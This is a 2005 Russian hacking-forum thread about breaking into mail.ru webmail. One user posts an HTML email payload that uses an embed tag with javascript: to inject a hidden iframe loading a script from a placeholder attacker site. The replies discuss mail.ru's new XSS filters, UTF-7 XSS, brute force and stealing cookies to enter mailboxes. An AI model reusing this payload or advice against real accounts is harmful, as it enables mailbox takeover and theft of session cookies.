Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
19.06.2005, 17:46
|
|
Новичок
Регистрация: 24.02.2004
Сообщений: 9
Провел на форуме:
3370
Репутация:
0
|
|
проблема с mail.ru
сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил
Код HTML:
<embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>
мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
зы: вначале письмо в хтмл формате (не аттачем)...
вот...че такое? |
|
|
19.06.2005, 17:54
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
там поставили новые фильтры
теперь c наличием xss - там проблема
|
|
|
|
19.06.2005, 18:18
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
Мдя...Mail.ru обновился....
|
|
|
|
19.06.2005, 18:32
|
|
Новичок
Регистрация: 24.02.2004
Сообщений: 9
Провел на форуме:
3370
Репутация:
0
|
|
*** и чего...теперь там дыр нету? как еще можно ломануть? =)
зы: социнженерью не предлагать...
from moderator : не матерись
Последний раз редактировалось Майор; 19.06.2005 в 19:21..
|
|
|
|
19.06.2005, 19:11
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Почитайте "Использование UTF-7 в атаках класса XSS"
Последний раз редактировалось Майор; 19.06.2005 в 19:13..
|
|
|
|
19.06.2005, 19:12
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
раз не СИ, так брут -)
|
|
|
|
19.06.2005, 19:19
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly= |
|
|
|
19.06.2005, 19:31
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
Сообщение от JazzzSummerMan
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly=уже не пашет
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
